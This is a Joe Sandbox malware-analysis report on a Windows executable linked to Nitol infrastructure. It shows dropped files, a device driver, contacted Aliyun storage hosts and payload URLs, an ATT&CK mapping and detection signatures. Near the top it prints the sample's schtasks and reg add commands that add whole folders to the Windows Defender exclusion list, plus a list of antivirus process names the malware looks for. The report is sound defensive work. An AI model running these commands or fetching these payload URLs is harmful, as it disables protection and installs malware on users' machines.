Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAFFD40 cpuid 4_2_00007FF8BFAFFD40
Source: C:\Users\user\Documents\lSQb8c.exeCode function: GetLocaleInfoA,4_2_000000014000F370
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_000000014000A370
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_0000000140005A70
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: lSQb8c.exe, lSQb8c.exe, 00000005.00000002.3257112817.0000000002938000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,4_2_00000001400042B0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
1
Disable or Modify Tools
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter
24
Windows Service
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSASS Memory3
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager123
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution
Login Hook24
Windows Service
1
DLL Side-Loading
NTDS141
Security Software Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
Process Injection
32
Masquerading
LSA Secrets1
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job
1
Modify Registry
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Virtualization/Sandbox Evasion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585197 Sample: 23567791246-764698008.02.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 62 yuqi7x.oss-cn-beijing.aliyuncs.com 2->62 64 sc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 2->64 66 4 other IPs or domains 2->66 72 Malicious sample detected (through community Yara rule) 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->76 78 2 other signatures 2->78 8 23567791246-764698008.02.exe 1 24 2->8         started        13 lSQb8c.exe 19 2->13         started        15 lSQb8c.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 dnsIp5 68 sc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.93, 443, 49977, 49978 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->68 54 C:\Windows\System32\drivers\189atohci.sys, PE32+ 8->54 dropped 56 C:\Users\user\Documents\vselog.dll, PE32+ 8->56 dropped 58 C:\Users\user\Documents\lSQb8c.exe, PE32+ 8->58 dropped 86 Drops PE files to the document folder of the user 8->86 88 Sample is not signed and drops a device driver 8->88 90 Tries to detect virtualization through RDTSC time measurements 8->90 70 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49984, 49985 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 13->70 60 C:\Program Files (x86)\szbGon\szbGon.exe, PE32 13->60 dropped 92 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->92 94 Found direct / indirect Syscall (likely to bypass EDR) 13->94 19 cmd.exe 1 13->19         started        22 cmd.exe 1 13->22         started        24 cmd.exe 1 13->24         started        26 cmd.exe 1 13->26         started        96 Uses cmd line tools excessively to alter registry or file data 17->96 28 reg.exe 1 1 17->28         started        30 reg.exe 1 1 17->30         started        32 reg.exe 1 1 17->32         started        34 5 other processes 17->34 file6 signatures7 process8 signatures9 80 Uses cmd line tools excessively to alter registry or file data 19->80 82 Uses schtasks.exe or at.exe to add and modify task schedules 19->82 36 conhost.exe 19->36         started        38 schtasks.exe 1 19->38         started        46 2 other processes 19->46 40 conhost.exe 22->40         started        48 3 other processes 22->48 42 conhost.exe 24->42         started        50 3 other processes 24->50 44 conhost.exe 26->44         started        52 3 other processes 26->52 84 Adds extensions / path to Windows Defender exclusion list (Registry) 28->84 process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
23567791246-764698008.02.exe5%ReversingLabs
23567791246-764698008.02.exe12%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\szbGon\szbGon.exe0%ReversingLabs
C:\Users\user\Documents\lSQb8c.exe0%ReversingLabs
C:\Windows\System32\drivers\189atohci.sys9%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://yuqi7x.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgL0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifT0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-510%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10030%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.gifhttps://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003IE0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgD0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg40%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com//0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-10030%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/b0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-1003p0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003v0%Avira URL Cloudsafe
https://yuqi7x.oss-c0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg-PC0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/60%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgW0%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-10030%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-10030%Avira URL Cloudsafe
https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    unknown
    sc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
    39.103.20.93
    truefalse
      unknown
      yuqi7x.oss-cn-beijing.aliyuncs.com
      unknown
      unknownfalse
        unknown
        22mm.oss-cn-hangzhou.aliyuncs.com
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/i.datfalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.giffalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/s.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/d.giffalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/c.giffalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/s.datfalse
          • Avira URL Cloud: safe
          unknown
          https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.giffalse
          • Avira URL Cloud: safe
          unknown
          https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51lSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpglSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgLlSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.thawte.com0lSQb8c.exe.0.dr, 189atohci.sys.0.drfalse
            high
            https://yuqi7x.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-100323567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifT23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://yuqi7x.oss-cn-beijing.aliyuncs.com/23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.gifhttps://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifhttp23567791246-764698008.02.exe, 00000000.00000003.2956301436.000000000061E000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003IElSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.symauth.com/cps0(lSQb8c.exe.0.drfalse
              high
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgDlSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/blSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://yuqi7x.oss-cn-beijing.aliyuncs.com//23567791246-764698008.02.exe, 00000000.00000003.2882892555.00000000005B6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-1003p23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003vlSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://yuqi7x.oss-c23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0lSQb8c.exe.0.dr, 189atohci.sys.0.drfalse
                high
                http://www.symauth.com/rpa00lSQb8c.exe.0.drfalse
                  high
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg-PClSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgWlSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/6lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpglSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-100323567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.0000000000557000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.v23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpglSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000138000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    118.178.60.9
                    sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                    37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                    39.103.20.93
                    sc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                    37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1585197
                    Start date and time:2025-01-07 09:57:11 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 46s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:38
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:23567791246-764698008.02.exe
                    Detection:MAL
                    Classification:mal100.evad.winEXE@55/17@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    03:58:03API Interceptor941x Sleep call for process: 23567791246-764698008.02.exe modified
                    09:59:44Task SchedulerRun new task: VVe1I path: C:\Users\user\Documents\lSQb8c.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    118.178.60.9287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                      2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                        2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                          2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                            45631.exeGet hashmaliciousNitolBrowse
                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  45631.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  0000000000000000.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                  • 39.103.20.48
                                  287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                  • 39.103.20.48
                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                  • 8.171.83.51
                                  i486.elfGet hashmaliciousMiraiBrowse
                                  • 47.107.186.79
                                  arm4.elfGet hashmaliciousMiraiBrowse
                                  • 118.178.206.165
                                  2.elfGet hashmaliciousUnknownBrowse
                                  • 60.205.221.193
